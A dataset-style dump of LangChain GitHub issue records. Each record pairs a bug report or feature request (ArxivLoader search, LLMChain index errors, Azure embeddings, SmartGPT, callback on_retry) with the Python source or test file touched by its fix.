LLM to use to retry the completion. parser: The parser to use to parse the output. prompt: The prompt to use to retry the completion. Returns: A RetryWithErrorOutputParser. """ chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T: try: parsed_completion = self.parser.parse(completion) except OutputParserException as e: new_completion = self.retry_chain.run( prompt=prompt_value.to_string(), completion=completion, error=repr(e) ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def parse(self, completion: str) -> T: raise NotImplementedError( "This OutputParser can only be called by the `parse_with_prompt` method." ) def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "retry_with_error"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/langchain/utilities/arxiv.py
"""Util that calls Arxiv.""" import logging import os from typing import Any, Dict, List, Optional from pydantic import BaseModel, root_validator from langchain.schema import Document logger = logging.getLogger(__name__) class ArxivAPIWrapper(BaseModel): """Wrapper around ArxivAPI. To use, you should have the ``arxiv`` python package installed. https://lukasschwab.me/arxiv.py/index.html This wrapper will use the Arxiv API to conduct searches and fetch document summaries. By default, it will return the document summaries of the top-k results. It limits the Document content by doc_content_chars_max. Set doc_content_chars_max=None if you don't want to limit the content size. Attributes: top_k_results: number of the top-scored document used for the arxiv tool ARXIV_MAX_QUERY_LENGTH: the cut limit on the query used for the arxiv tool. load_max_docs: a limit to the number of loaded documents load_all_available_meta: if True: the `metadata` of the loaded Documents contains all available meta info (see https://lukasschwab.me/arxiv.py/index.html#Result), if False: the `metadata` contains only the published date, title, authors and summary. doc_content_chars_max: an optional cut limit for the length of a document's content Example: .. code-block:: python from langchain.utilities.arxiv import ArxivAPIWrapper arxiv = ArxivAPIWrapper( top_k_results = 3, ARXIV_MAX_QUERY_LENGTH = 300, load_max_docs = 3, load_all_available_meta = False, doc_content_chars_max = 40000 ) arxiv.run("tree of thought llm) """ arxiv_search: Any #: :meta private: arxiv_exceptions: Any # :meta private: top_k_results: int = 3 ARXIV_MAX_QUERY_LENGTH = 300 load_max_docs: int = 100 load_all_available_meta: bool = False doc_content_chars_max: Optional[int] = 4000 @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that the python package exists in environment.""" try: import arxiv values["arxiv_search"] = arxiv.Search values["arxiv_exceptions"] = ( arxiv.ArxivError, arxiv.UnexpectedEmptyPageError, arxiv.HTTPError, ) values["arxiv_result"] = arxiv.Result except ImportError: raise ImportError( "Could not import arxiv python package. " "Please install it with `pip install arxiv`." ) return values def run(self, query: str) -> str: """ Performs an arxiv search and A single string with the publish date, title, authors, and summary for each article separated by two newlines. If an error occurs or no documents found, error text is returned instead. Wrapper for https://lukasschwab.me/arxiv.py/index.html#Search Args: query: a plaintext search query """ # noqa: E501 try: results = self.arxiv_search( # type: ignore query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.top_k_results ).results() except self.arxiv_exceptions as ex: return f"Arxiv exception: {ex}" docs = [ f"Published: {result.updated.date()}\n" f"Title: {result.title}\n" f"Authors: {', '.join(a.name for a in result.authors)}\n" f"Summary: {result.summary}" for result in results ] if docs: return "\n\n".join(docs)[: self.doc_content_chars_max] else: return "No good Arxiv Result was found" def load(self, query: str) -> List[Document]: """ Run Arxiv search and get the article texts plus the article meta information. See https://lukasschwab.me/arxiv.py/index.html#Search Returns: a list of documents with the document.page_content in text format Performs an arxiv search, downloads the top k results as PDFs, loads them as Documents, and returns them in a List. Args: query: a plaintext search query """ # noqa: E501 try: import fitz except ImportError: raise ImportError( "PyMuPDF package not found, please install it with " "`pip install pymupdf`" ) try: results = self.arxiv_search( # type: ignore query[: self.ARXIV_MAX_QUERY_LENGTH], max_results=self.load_max_docs ).results() except self.arxiv_exceptions as ex: logger.debug("Error on arxiv: %s", ex) return [] docs: List[Document] = [] for result in results: try: doc_file_name: str = result.download_pdf() with fitz.open(doc_file_name) as doc_file: text: str = "".join(page.get_text() for page in doc_file) except FileNotFoundError as f_ex: logger.debug(f_ex) continue if self.load_all_available_meta: extra_metadata = { "entry_id": result.entry_id, "published_first_time": str(result.published.date()), "comment": result.comment, "journal_ref": result.journal_ref, "doi": result.doi, "primary_category": result.primary_category, "categories": result.categories, "links": [link.href for link in result.links], } else: extra_metadata = {} metadata = { "Published": str(result.updated.date()), "Title": result.title, "Authors": ", ".join(a.name for a in result.authors), "Summary": result.summary, **extra_metadata, } doc = Document( page_content=text[: self.doc_content_chars_max], metadata=metadata ) docs.append(doc) os.remove(doc_file_name) return docs
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/tests/integration_tests/document_loaders/test_arxiv.py
from typing import List from langchain.document_loaders.arxiv import ArxivLoader from langchain.schema import Document def assert_docs(docs: List[Document]) -> None: for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"} def test_load_success() -> None: """Test that returns one document""" loader = ArxivLoader(query="1605.08386", load_max_docs=2) docs = loader.load() assert len(docs) == 1 print(docs[0].metadata) print(docs[0].page_content) assert_docs(docs) def test_load_returns_no_result() -> None: """Test that returns no docs""" loader = ArxivLoader(query="1605.08386WWW", load_max_docs=2) docs = loader.load() assert len(docs) == 0 def test_load_returns_limited_docs() -> None: """Test that returns several docs""" expected_docs = 2 loader = ArxivLoader(query="ChatGPT", load_max_docs=expected_docs) docs = loader.load() assert len(docs) == expected_docs assert_docs(docs) def test_load_returns_full_set_of_metadata() -> None: """Test that returns several docs""" loader = ArxivLoader(query="ChatGPT", load_max_docs=1, load_all_available_meta=True) docs = loader.load() assert len(docs) == 1 for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata).issuperset( {"Published", "Title", "Authors", "Summary"} ) print(doc.metadata) assert len(set(doc.metadata)) > 4
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,046
ArxivLoader incorrect results
### System Info Latest pip versions ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I tried searching by exact title in the following way: ```python docs = ArxivLoader(query="MetaGPT: Meta Programming for Multi-Agent Collaborative Framework", load_max_docs=1).load() ``` But the result is incorrect. The search works properly on the arxiv website. ### Expected behavior Correct paper returned
https://github.com/langchain-ai/langchain/issues/9046
https://github.com/langchain-ai/langchain/pull/9061
e94a5d753fe01aff1fa1592cd59d37fa64ef24a2
fcbbddedaed196b0aa0377ca8c78b3410f62420f
"2023-08-10T15:18:24Z"
python
"2023-08-10T18:59:39Z"
libs/langchain/tests/integration_tests/utilities/test_arxiv.py
"""Integration test for Arxiv API Wrapper.""" from typing import Any, List import pytest from langchain.agents.load_tools import load_tools from langchain.schema import Document from langchain.tools.base import BaseTool from langchain.utilities import ArxivAPIWrapper @pytest.fixture def api_client() -> ArxivAPIWrapper: return ArxivAPIWrapper() def test_run_success(api_client: ArxivAPIWrapper) -> None: """Test that returns the correct answer""" output = api_client.run("1605.08386") assert "Heat-bath random walks with Markov bases" in output def test_run_returns_several_docs(api_client: ArxivAPIWrapper) -> None: """Test that returns several docs""" output = api_client.run("Caprice Stanley") assert "On Mixing Behavior of a Family of Random Walks" in output def test_run_returns_no_result(api_client: ArxivAPIWrapper) -> None: """Test that gives no result.""" output = api_client.run("1605.08386WWW") assert "No good Arxiv Result was found" == output def assert_docs(docs: List[Document]) -> None: for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata) == {"Published", "Title", "Authors", "Summary"} def test_load_success(api_client: ArxivAPIWrapper) -> None: """Test that returns one document""" docs = api_client.load("1605.08386") assert len(docs) == 1 assert_docs(docs) def test_load_returns_no_result(api_client: ArxivAPIWrapper) -> None: """Test that returns no docs""" docs = api_client.load("1605.08386WWW") assert len(docs) == 0 def test_load_returns_limited_docs() -> None: """Test that returns several docs""" expected_docs = 2 api_client = ArxivAPIWrapper(load_max_docs=expected_docs) docs = api_client.load("ChatGPT") assert len(docs) == expected_docs assert_docs(docs) def test_load_returns_limited_doc_content_chars() -> None: """Test that returns limited doc_content_chars_max""" doc_content_chars_max = 100 api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max) docs = api_client.load("1605.08386") assert len(docs[0].page_content) == doc_content_chars_max def test_load_returns_unlimited_doc_content_chars() -> None: """Test that returns unlimited doc_content_chars_max""" doc_content_chars_max = None api_client = ArxivAPIWrapper(doc_content_chars_max=doc_content_chars_max) docs = api_client.load("1605.08386") assert len(docs[0].page_content) == 54337 def test_load_returns_full_set_of_metadata() -> None: """Test that returns several docs""" api_client = ArxivAPIWrapper(load_max_docs=1, load_all_available_meta=True) docs = api_client.load("ChatGPT") assert len(docs) == 1 for doc in docs: assert doc.page_content assert doc.metadata assert set(doc.metadata).issuperset( {"Published", "Title", "Authors", "Summary"} ) print(doc.metadata) assert len(set(doc.metadata)) > 4 def _load_arxiv_from_universal_entry(**kwargs: Any) -> BaseTool: tools = load_tools(["arxiv"], **kwargs) assert len(tools) == 1, "loaded more than 1 tool" return tools[0] def test_load_arxiv_from_universal_entry() -> None: arxiv_tool = _load_arxiv_from_universal_entry() output = arxiv_tool("Caprice Stanley") assert ( "On Mixing Behavior of a Family of Random Walks" in output ), "failed to fetch a valid result" def test_load_arxiv_from_universal_entry_with_params() -> None: params = { "top_k_results": 1, "load_max_docs": 10, "load_all_available_meta": True, } arxiv_tool = _load_arxiv_from_universal_entry(**params) assert isinstance(arxiv_tool, ArxivAPIWrapper) wp = arxiv_tool.api_wrapper assert wp.top_k_results == 1, "failed to assert top_k_results" assert wp.load_max_docs == 10, "failed to assert load_max_docs" assert ( wp.load_all_available_meta is True ), "failed to assert load_all_available_meta"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
1,733
list index out of range error if similarity search gives 0 docs
https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/vectorstores/milvus.py#L319 I'm using milvus where for my question I'm getting 0 documents and so index out of range error occurs Error line: https://github.com/hwchase17/langchain/blob/276940fd9babf8aec570dd869cc84fbca1c766bf/langchain/chains/llm.py#L95
https://github.com/langchain-ai/langchain/issues/1733
https://github.com/langchain-ai/langchain/pull/5769
c0acbdca1b5884ac90d17908fb2bb555a9ed9909
2184e3a4005f5c48126523cce92930fca6a31760
"2023-03-17T11:14:48Z"
python
"2023-08-11T05:50:39Z"
libs/langchain/langchain/chains/llm.py
"""Chain that just formats a prompt and calls an LLM.""" from __future__ import annotations import warnings from typing import Any, Dict, List, Optional, Sequence, Tuple, Union from pydantic import Extra, Field from langchain.callbacks.manager import ( AsyncCallbackManager, AsyncCallbackManagerForChainRun, CallbackManager, CallbackManagerForChainRun, Callbacks, ) from langchain.chains.base import Chain from langchain.load.dump import dumpd from langchain.prompts.prompt import PromptTemplate from langchain.schema import ( BaseLLMOutputParser, BasePromptTemplate, LLMResult, PromptValue, StrOutputParser, ) from langchain.schema.language_model import BaseLanguageModel from langchain.utils.input import get_colored_text class LLMChain(Chain): """Chain to run queries against LLMs. Example: .. code-block:: python from langchain import LLMChain, OpenAI, PromptTemplate prompt_template = "Tell me a {adjective} joke" prompt = PromptTemplate( input_variables=["adjective"], template=prompt_template ) llm = LLMChain(llm=OpenAI(), prompt=prompt) """ @property def lc_serializable(self) -> bool: return True prompt: BasePromptTemplate """Prompt object to use.""" llm: BaseLanguageModel """Language model to call.""" output_key: str = "text" #: :meta private: output_parser: BaseLLMOutputParser = Field(default_factory=StrOutputParser) """Output parser to use. Defaults to one that takes the most likely string but does not change it otherwise.""" return_final_only: bool = True """Whether to return only the final parsed result. Defaults to True. If false, will return a bunch of extra information about the generation.""" llm_kwargs: dict = Field(default_factory=dict) class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def input_keys(self) -> List[str]: """Will be whatever keys the prompt expects. :meta private: """ return self.prompt.input_variables @property def output_keys(self) -> List[str]: """Will always return text key. :meta private: """ if self.return_final_only: return [self.output_key] else: return [self.output_key, "full_generation"] def _call( self, inputs: Dict[str, Any], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, str]: response = self.generate([inputs], run_manager=run_manager) return self.create_outputs(response)[0] def generate( self, input_list: List[Dict[str, Any]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> LLMResult: """Generate LLM result from inputs.""" prompts, stop = self.prep_prompts(input_list, run_manager=run_manager) return self.llm.generate_prompt( prompts, stop, callbacks=run_manager.get_child() if run_manager else None, **self.llm_kwargs, ) async def agenerate( self, input_list: List[Dict[str, Any]], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> LLMResult: """Generate LLM result from inputs.""" prompts, stop = await self.aprep_prompts(input_list, run_manager=run_manager) return await self.llm.agenerate_prompt( prompts, stop, callbacks=run_manager.get_child() if run_manager else None, **self.llm_kwargs, ) def prep_prompts( self, input_list: List[Dict[str, Any]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Tuple[List[PromptValue], Optional[List[str]]]: """Prepare prompts from inputs.""" stop = None if "stop" in input_list[0]: stop = input_list[0]["stop"] prompts = [] for inputs in input_list: selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} prompt = self.prompt.format_prompt(**selected_inputs) _colored_text = get_colored_text(prompt.to_string(), "green") _text = "Prompt after formatting:\n" + _colored_text if run_manager: run_manager.on_text(_text, end="\n", verbose=self.verbose) if "stop" in inputs and inputs["stop"] != stop: raise ValueError( "If `stop` is present in any inputs, should be present in all." ) prompts.append(prompt) return prompts, stop async def aprep_prompts( self, input_list: List[Dict[str, Any]], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Tuple[List[PromptValue], Optional[List[str]]]: """Prepare prompts from inputs.""" stop = None if "stop" in input_list[0]: stop = input_list[0]["stop"] prompts = [] for inputs in input_list: selected_inputs = {k: inputs[k] for k in self.prompt.input_variables} prompt = self.prompt.format_prompt(**selected_inputs) _colored_text = get_colored_text(prompt.to_string(), "green") _text = "Prompt after formatting:\n" + _colored_text if run_manager: await run_manager.on_text(_text, end="\n", verbose=self.verbose) if "stop" in inputs and inputs["stop"] != stop: raise ValueError( "If `stop` is present in any inputs, should be present in all." ) prompts.append(prompt) return prompts, stop def apply( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> List[Dict[str, str]]: """Utilize the LLM generate method for speed gains.""" callback_manager = CallbackManager.configure( callbacks, self.callbacks, self.verbose ) run_manager = callback_manager.on_chain_start( dumpd(self), {"input_list": input_list}, ) try: response = self.generate(input_list, run_manager=run_manager) except (KeyboardInterrupt, Exception) as e: run_manager.on_chain_error(e) raise e outputs = self.create_outputs(response) run_manager.on_chain_end({"outputs": outputs}) return outputs async def aapply( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> List[Dict[str, str]]: """Utilize the LLM generate method for speed gains.""" callback_manager = AsyncCallbackManager.configure( callbacks, self.callbacks, self.verbose ) run_manager = await callback_manager.on_chain_start( dumpd(self), {"input_list": input_list}, ) try: response = await self.agenerate(input_list, run_manager=run_manager) except (KeyboardInterrupt, Exception) as e: await run_manager.on_chain_error(e) raise e outputs = self.create_outputs(response) await run_manager.on_chain_end({"outputs": outputs}) return outputs @property def _run_output_key(self) -> str: return self.output_key def create_outputs(self, llm_result: LLMResult) -> List[Dict[str, Any]]: """Create outputs from response.""" result = [ # Get the text of the top generated string. { self.output_key: self.output_parser.parse_result(generation), "full_generation": generation, } for generation in llm_result.generations ] if self.return_final_only: result = [{self.output_key: r[self.output_key]} for r in result] return result async def _acall( self, inputs: Dict[str, Any], run_manager: Optional[AsyncCallbackManagerForChainRun] = None, ) -> Dict[str, str]: response = await self.agenerate([inputs], run_manager=run_manager) return self.create_outputs(response)[0] def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str: """Format prompt with kwargs and pass to LLM. Args: callbacks: Callbacks to pass to LLMChain **kwargs: Keys to pass to prompt template. Returns: Completion from LLM. Example: .. code-block:: python completion = llm.predict(adjective="funny") """ return self(kwargs, callbacks=callbacks)[self.output_key] async def apredict(self, callbacks: Callbacks = None, **kwargs: Any) -> str: """Format prompt with kwargs and pass to LLM. Args: callbacks: Callbacks to pass to LLMChain **kwargs: Keys to pass to prompt template. Returns: Completion from LLM. Example: .. code-block:: python completion = llm.predict(adjective="funny") """ return (await self.acall(kwargs, callbacks=callbacks))[self.output_key] def predict_and_parse( self, callbacks: Callbacks = None, **kwargs: Any ) -> Union[str, List[str], Dict[str, Any]]: """Call predict and then parse the results.""" warnings.warn( "The predict_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = self.predict(callbacks=callbacks, **kwargs) if self.prompt.output_parser is not None: return self.prompt.output_parser.parse(result) else: return result async def apredict_and_parse( self, callbacks: Callbacks = None, **kwargs: Any ) -> Union[str, List[str], Dict[str, str]]: """Call apredict and then parse the results.""" warnings.warn( "The apredict_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = await self.apredict(callbacks=callbacks, **kwargs) if self.prompt.output_parser is not None: return self.prompt.output_parser.parse(result) else: return result def apply_and_parse( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> Sequence[Union[str, List[str], Dict[str, str]]]: """Call apply and then parse the results.""" warnings.warn( "The apply_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = self.apply(input_list, callbacks=callbacks) return self._parse_generation(result) def _parse_generation( self, generation: List[Dict[str, str]] ) -> Sequence[Union[str, List[str], Dict[str, str]]]: if self.prompt.output_parser is not None: return [ self.prompt.output_parser.parse(res[self.output_key]) for res in generation ] else: return generation async def aapply_and_parse( self, input_list: List[Dict[str, Any]], callbacks: Callbacks = None ) -> Sequence[Union[str, List[str], Dict[str, str]]]: """Call apply and then parse the results.""" warnings.warn( "The aapply_and_parse method is deprecated, " "instead pass an output parser directly to LLMChain." ) result = await self.aapply(input_list, callbacks=callbacks) return self._parse_generation(result) @property def _chain_type(self) -> str: return "llm_chain" @classmethod def from_string(cls, llm: BaseLanguageModel, template: str) -> LLMChain: """Create LLMChain from LLM and template.""" prompt_template = PromptTemplate.from_template(template) return cls(llm=llm, prompt=prompt_template)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
5,001
Azure OpenAI Embeddings failed due to no deployment_id set.
### System Info Broken by #4915 Error: `Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>` I'm putting a PR out to fix this now. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Run example notebook: https://github.com/hwchase17/langchain/blob/22d844dc0795e7e53a4cc499bf4974cb83df490d/docs/modules/models/text_embedding/examples/azureopenai.ipynb ### Expected behavior Embedding using Azure OpenAI should work.
https://github.com/langchain-ai/langchain/issues/5001
https://github.com/langchain-ai/langchain/pull/5002
45741bcc1b65e588e560b60e347ab391858d53f5
1d3735a84c64549d4ef338506ae0b68d53541b44
"2023-05-19T20:18:47Z"
python
"2023-08-11T22:43:01Z"
libs/langchain/tests/integration_tests/embeddings/test_openai.py
"""Test openai embeddings.""" import numpy as np import openai import pytest from langchain.embeddings.openai import OpenAIEmbeddings def test_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 def test_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.asyncio async def test_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = OpenAIEmbeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 def test_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.asyncio async def test_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = OpenAIEmbeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 def test_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" document = ["", "abc"] embedding = OpenAIEmbeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 def test_embed_documents_normalized() -> None: output = OpenAIEmbeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) def test_embed_query_normalized() -> None: output = OpenAIEmbeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
docs/extras/use_cases/self_check/smart_llm.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/langchain_experimental/smart_llm/__init__.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/langchain_experimental/smart_llm/base.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,463
`SmartGPT` workflow
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
https://github.com/langchain-ai/langchain/issues/4463
https://github.com/langchain-ai/langchain/pull/4816
1d3735a84c64549d4ef338506ae0b68d53541b44
8aab39e3ce640c681bbdc446ee40f7e34a56cc52
"2023-05-10T15:52:11Z"
python
"2023-08-11T22:44:27Z"
libs/experimental/tests/unit_tests/test_smartllm.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,542
Error: 'OpenAICallbackHandler' object has no attribute 'on_retry'`
### System Info **LangChain:** 0.0.248 **Python:** 3.10.10 **OS version:** Linux 5.10.178-162.673.amzn2.x86_64 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction **Code:** ``` try: with get_openai_callback() as cb: llm_chain = LLMChain(llm=llm, prompt=prompt_main) all_text = str(template) + str(prompt) + str(usescases) + str(transcript) threshold = (llm.get_num_tokens(text=all_text) + 800) dataframe_copy.loc[index, "Total Tokens"] = threshold if int(threshold) <= 4000: chatgpt_output = llm_chain.run({"prompt":prompt, "use_cases_dictionary":usescases, "transcript":transcript}) chatgpt_output = text_post_processing(chatgpt_output) dataframe_copy.loc[index, "ChatGPT Output"] = chatgpt_output dataframe_copy.loc[index, "Cost (USD)"] = cb.total_cost else: dataframe_copy.loc[index, "ChatGPT Output"] = " " dataframe_copy.loc[index, "Cost (USD)"] = " " except Exception as e: dataframe_copy.loc[index, "ChatGPT Output"] = " " dataframe_copy.loc[index, "Cost (USD)"] = " " continue ``` **Error Message:** `Retrying langchain.chat_models.openai.ChatOpenAI.completion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIError: Bad gateway. {"error":{"code":502,"message":"Bad gateway.","param":null,"type":"cf_bad_gateway"}} 502 {'error': {'code': 502, 'message': 'Bad gateway.', 'param': None, 'type': 'cf_bad_gateway'}} {'Date': 'Mon, 31 Jul 2023 20:24:53 GMT', 'Content-Type': 'application/json', 'Content-Length': '84', 'Connection': 'keep-alive', 'X-Frame-Options': 'SAMEORIGIN', 'Referrer-Policy': 'same-origin', 'Cache-Control': 'private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Expires': 'Thu, 01 Jan 1970 00:00:01 GMT', 'Server': 'cloudflare', 'CF-RAY': '7ef889a50eaca7f3-SYD', 'alt-svc': 'h3=":443"; ma=86400'}. Error in OpenAICallbackHandler.on_retry callback: 'OpenAICallbackHandler' object has no attribute 'on_retry'` ![bug](https://github.com/langchain-ai/langchain/assets/43797457/9b8025e0-f486-48bb-9d74-fdaa6cef4574) ### Expected behavior I went through the callback [documentation ](https://api.python.langchain.com/en/latest/callbacks/langchain.callbacks.openai_info.OpenAICallbackHandler.html) and yes the "on_retry" method wasn't included over there. So I guess the team needs to modify the core code for OpenAICallbackHandler because it's calling "on_retry" for some reason.
https://github.com/langchain-ai/langchain/issues/8542
https://github.com/langchain-ai/langchain/pull/9230
d0a0d560add6c5bc6ded60be506a87d98bf333c3
c478fc208ed4c29e979abeb7a532eb4d01431e1b
"2023-07-31T21:01:43Z"
python
"2023-08-14T23:45:17Z"
libs/langchain/langchain/callbacks/base.py
